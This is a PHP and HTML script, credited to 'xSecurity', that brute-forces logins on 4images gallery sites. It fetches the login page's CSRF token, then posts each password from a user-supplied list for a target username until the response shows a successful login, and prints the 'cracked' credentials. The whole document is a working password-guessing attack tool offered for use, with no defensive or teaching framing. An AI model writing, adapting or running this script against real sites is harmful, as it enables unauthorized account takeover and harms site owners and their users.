4images Brute Force

1. <form method='POST'>
2. <title>4images Brute Force PHP Version By xSecurity</title>
3. <center>
4. <input type='text' name='url' placeholder='site'>
5. <input type='text' name='username' placeholder='username'><br>
6. <textarea rows='16' cols='38' name='password' placeholder='passwords ;P'></textarea><br>
7. <input type='submit' value='Start Brute'><br>
8. </center>
9. </form>
10. <?
11. /*
12. By xSecurity
13. 4images brute force php version
14. sec4ever.com - hackteach.org - is-sec.com
15. */
16.  
17. @set_time_limit(0);
18.  
19. $site = $_POST['url'];
20. $username = $_POST['username'];
21. $pass = explode("\r\n", $_POST['password']);
22. //$password = "pass";
23. # Function Token
24. function token($site)
25. {
26. $curl = curl_init();
27. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
28. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
29. curl_setopt($curl,CURLOPT_URL, $site);
30. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
31. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
32. $start = curl_exec($curl);
33. preg_match('/<input type="hidden" name="__csrf" value="(.*?)" /', $start, $token);
34. return $token[1];
35. }
36. $hash = token($site);
37.  
38. # Function Brute
39. function brute($site,$username,$password,$hash)
40. {
41. $curl = curl_init();
42. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
43. curl_setopt($curl, CURLOPT_POST, 1);
44. curl_setopt($curl, CURLOPT_URL, $site);
45. curl_setopt($curl, CURLOPT_POSTFIELDS, "__csrf={$hash}&action=login&redirect=#&loginusername=$username&loginpassword=$password");
46. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
47. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
48. $brute = curl_exec($curl);
49. return $brute;
50. }
51. foreach($pass as $password)
52. {
53. $b0x = brute($site,$username,$password,$hash);
54. if(preg_match('/<p><a href="#">(.*?)<\/a><\/p>/', $b0x))
55. {
56. echo "<center> Cracked Username: {$username} > Password: {$password}</center>";
57. break;
58. }
59. //brute($site,$username,$password,$hash);
60. }
61. @system("del cookie.txt");
62. @system("rm cookie.txt");
63. ?>